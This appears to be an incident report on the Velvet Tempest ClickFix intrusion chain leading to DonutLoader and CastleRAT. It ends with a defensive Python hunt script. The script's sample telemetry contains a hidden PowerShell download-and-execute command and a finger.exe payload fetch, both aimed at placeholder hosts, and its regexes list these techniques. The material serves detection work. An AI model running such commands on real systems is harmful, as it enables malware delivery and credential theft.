Full Report
Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor. [...]
Analysis Summary
# Incident Report: Velvet Tempest "ClickFix" & Termite Ransomware Campaign
## Executive Summary
The threat actor Velvet Tempest (DEV-0504) utilized a "ClickFix" social engineering technique to gain initial access, subsequently deploying DonutLoader and the CastleRAT backdoor. The attack involved sophisticated hands-on-keyboard activity, including credential harvesting and environment profiling, commonly associated with double-extortion ransomware operations. While the observed intrusion terminated prior to encryption, the infrastructure was linked to several high-profile Termite ransomware breaches.
## Incident Details
- **Discovery Date:** February 2026
- **Incident Date:** February 3 – February 16, 2026 (12-day observation period)
- **Affected Organization:** Non-profit organization (Emulated/Replica environment for research)
- **Sector:** Non-Profit / SaaS / Healthcare (based on historical victimology)
- **Geography:** USA and Australia
## Timeline of Events
### Initial Access
- **Date/Time:** February 3, 2026
- **Vector:** Malvertising / Social Engineering (ClickFix)
- **Details:** Victims were presented with a fraudulent "CAPTCHA" or "Fix" prompt that instructed them to copy and paste an obfuscated command into the Windows Run dialog (Win+R), triggering a malicious PowerShell/CMD chain.
### Lateral Movement
- **Details:** After gaining a foothold, attackers performed Active Directory (AD) reconnaissance and host discovery. They utilized legitimate Windows utilities (Living-off-the-Land) to profile the environment and move between systems.
### Data Exfiltration/Impact
- **Details:** Attackers used a PowerShell script to harvest credentials stored in Google Chrome. While Termite ransomware was not deployed in this specific 12-day window, the campaign is historically linked to data theft and double-extortion.
### Detection & Response
- **How it was discovered:** Observed by MalBeacon researchers through an emulated "honeypot" enterprise environment.
- **Response actions taken:** Monitoring of TTPs, mapping of staging IP addresses to known ransomware infrastructure, and identification of the CastleRAT payload.
## Attack Methodology
- **Initial Access:** ClickFix / CAPTCHA social engineering via malvertising.
- **Persistence:** Python-based components deployed in `C:\ProgramData`.
- **Privilege Escalation:** Not observed as a separate step; the actor relied on credentials harvested from browser data by PowerShell scripts (see Credential Access) to broaden access.
- **Defense Evasion:** Use of `finger.exe` to fetch payloads; compilation of .NET components via `csc.exe` in temporary directories; nested `cmd.exe` chains.
- **Credential Access:** Harvesting Chrome-stored credentials.
- **Discovery:** AD reconnaissance, environment profiling, and host discovery.
- **Lateral Movement:** Script-based movement and use of legitimate Windows tools.
- **Collection:** Automated scripts for data/credential gathering.
- **Exfiltration:** Not confirmed in the observation window; the actor-controlled IP addresses seen were used to stage tooling, which is tool delivery rather than data exfiltration.
- **Impact:** Deployment of DonutLoader and CastleRAT (often a precursor to Termite ransomware encryption).
## Impact Assessment
- **Financial:** High (Historically linked to Blue Yonder and Genea breaches).
- **Data Breach:** Compromise of user credentials and internal network structure.
- **Operational:** Potential for total business disruption if ransomware encryption is triggered.
- **Reputational:** High risk due to the sensitivity of data in sectors like healthcare (IVF) and SaaS.
## Indicators of Compromise
- **Network:** Staging IP address associated with Termite ransomware (IP defanged: `[REDACTED_IP_ADDRESS]`).
- **File:** `DonutLoader`, `CastleRAT`, archive files disguised as `.pdf`.
- **Behavioral:** Execution of `finger.exe` for external file retrieval; usage of `csc.exe` to compile code in `\Temp\` folders; Windows Run dialog abuse.
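The behavioral indicators above, together with the Defense Evasion and Persistence items under Attack Methodology, expressed as hunt rules over process-creation telemetry. This is an added example for this page, not code from the report or from MalBeacon. The field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine, CurrentDirectory, Computer); the sample records, the regular expressions and the two-indicator escalation threshold are assumptions chosen for illustration, and the hostnames and domains are constructed.

```python
"""Hunt rules for the Velvet Tempest ClickFix chain, run over constructed
Sysmon-style process-creation records. Added example; field names are Sysmon's,
everything else (samples, regexes, threshold) is an assumption."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    computer: str
    image: str
    parent_image: str
    command_line: str
    current_directory: str = ""


SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\mshta.exe")
# Tokens that make an explorer.exe-spawned shell look like a ClickFix paste:
# hidden window, encoded command, download-and-run, or a URL typed into Run.
CLICKFIX_TOKENS = re.compile(
    r"-w(?:indowstyle)?\s+hidden"
    r"|-e[a-z]*\s+[a-z0-9+/=]{20,}"
    r"|\biex\b|invoke-expression|downloadstring|frombase64string"
    r"|https?://"
)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def run_dialog_script_chain(e: ProcEvent):
    """explorer.exe is the parent of anything launched from the Run dialog."""
    if not e.parent_image.lower().endswith("\\explorer.exe"):
        return None
    if not e.image.lower().endswith(SHELLS):
        return None
    if CLICKFIX_TOKENS.search(e.command_line.lower()):
        return "run_dialog_script_chain"
    return None


def finger_remote_fetch(e: ProcEvent):
    """finger.exe contacting a remote host (user@host): no modern business use,
    and the report saw it used to pull payloads."""
    if e.image.lower().endswith("\\finger.exe") and re.search(r"\S+@\S+", e.command_line):
        return "finger_remote_fetch"
    return None


def csc_compile_from_temp(e: ProcEvent):
    """csc.exe reading sources from or writing output to a Temp directory."""
    if not e.image.lower().endswith("\\csc.exe"):
        return None
    haystack = (e.command_line + " " + e.current_directory).lower()
    if any(t in haystack for t in TEMP_DIRS):
        return "csc_compile_from_temp"
    return None


def python_in_programdata(e: ProcEvent):
    """Python interpreter or script living under C:\\ProgramData."""
    if not e.image.lower().endswith(("\\python.exe", "\\pythonw.exe")):
        return None
    if "\\programdata\\" in (e.image + " " + e.command_line).lower():
        return "python_in_programdata"
    return None


RULES = (run_dialog_script_chain, finger_remote_fetch,
         csc_compile_from_temp, python_in_programdata)


def evaluate(events):
    """Return {computer: sorted rule names} for every host that fired a rule."""
    hits = defaultdict(set)
    for e in events:
        for rule in RULES:
            label = rule(e)
            if label:
                hits[e.computer].add(label)
    return {host: sorted(labels) for host, labels in hits.items()}


def escalate(hits, threshold=2):
    """Hosts with two or more distinct indicators. A lone csc.exe or Run-box
    shell may be an admin; the chain in this report fires several in minutes."""
    return sorted(h for h, labels in hits.items() if len(labels) >= threshold)


# Constructed sample records (not from the report's telemetry).
SAMPLE_EVENTS = [
    ProcEvent("WS-0142", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              'cmd /c powershell -w hidden -c "iex (New-Object Net.WebClient).DownloadString(\'https://example.invalid/verify\')"'),
    ProcEvent("WS-0142", r"C:\Windows\System32\finger.exe", r"C:\Windows\System32\cmd.exe",
              "finger stage@example.invalid"),
    ProcEvent("WS-0142", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Windows\System32\cmd.exe",
              r"csc.exe /noconfig /out:C:\Users\j.doe\AppData\Local\Temp\x2k.dll C:\Users\j.doe\AppData\Local\Temp\x2k.cs"),
    ProcEvent("WS-0142", r"C:\ProgramData\pyrt\pythonw.exe", r"C:\Windows\System32\cmd.exe",
              r"pythonw.exe C:\ProgramData\pyrt\svc.py"),
    # Benign look-alikes: a build from a project directory and a plain Run-box command.
    ProcEvent("DEV-0007", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Program Files\dotnet\dotnet.exe",
              r"csc.exe /out:C:\src\app\bin\app.dll C:\src\app\Program.cs", r"C:\src\app"),
    ProcEvent("DEV-0007", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              "cmd /k ipconfig /all"),
]

if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for host, labels in found.items():
        print(host, labels)
    print("escalate:", escalate(found))
```

The escalation step is the part worth keeping when porting this to a SIEM: each rule on its own will page on developers and administrators, but a workstation that produces an explorer.exe-parented hidden PowerShell, a finger.exe fetch and a Temp-directory csc.exe build in the same window is the chain this report describes.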
## Response Actions
- **Containment:** Isolation of affected endpoints within the emulated environment.
- **Eradication:** Removal of Python persistence scripts in `C:\ProgramData`.
- **Recovery:** Identification of all compromised credentials for enterprise-wide password resets.
## Lessons Learned
- **The Human Element:** Attackers are successfully bypassing technical controls by convincing users to manually execute commands via the "Run" dialog.
- **Utility Abuse:** Standard utilities like `finger.exe` and `csc.exe` remain effective for evasion if not strictly monitored or blocked.
- **Precursor Detection:** Identifying the loader and backdoor stages (DonutLoader and CastleRAT) is critical to preventing the final-stage ransomware deployment.
## Recommendations
- **User Training:** Specifically educate employees on the dangers of "ClickFix" lures and instructions to "Copy/Paste" commands into Windows prompts.
- **Technical Restrictions:** Enable the Attack Surface Reduction (ASR) rule that blocks execution of potentially obfuscated scripts, and monitor or restrict `finger.exe` and `csc.exe`; `finger.exe` has no modern business use and can usually be blocked outright with application control, while `csc.exe` should at least be alerted on when it writes to `\Temp\` paths. Disabling the Run dialog for standard users via Group Policy removes the ClickFix entry point itself.
- **Endpoint Monitoring:** Heighten alerts for any unauthorized Python-based persistence in `C:\ProgramData`.
- **Credential Protection:** Use browser policies that disable the built-in password manager (or restrict it to an enterprise vault) so there are no stored browser credentials to harvest, and pair this with phishing-resistant MFA such as hardware security keys so that any password that is harvested is insufficient on its own.